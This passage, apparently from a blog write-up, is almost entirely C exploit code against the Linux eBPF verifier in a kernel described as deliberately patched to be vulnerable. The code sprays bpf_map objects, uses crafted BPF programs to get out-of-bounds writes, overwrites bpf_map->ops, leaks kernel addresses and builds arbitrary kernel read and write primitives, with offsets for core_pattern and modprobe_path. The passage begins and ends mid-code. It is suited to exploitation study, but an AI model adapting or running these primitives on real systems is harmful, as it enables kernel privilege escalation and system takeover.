                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

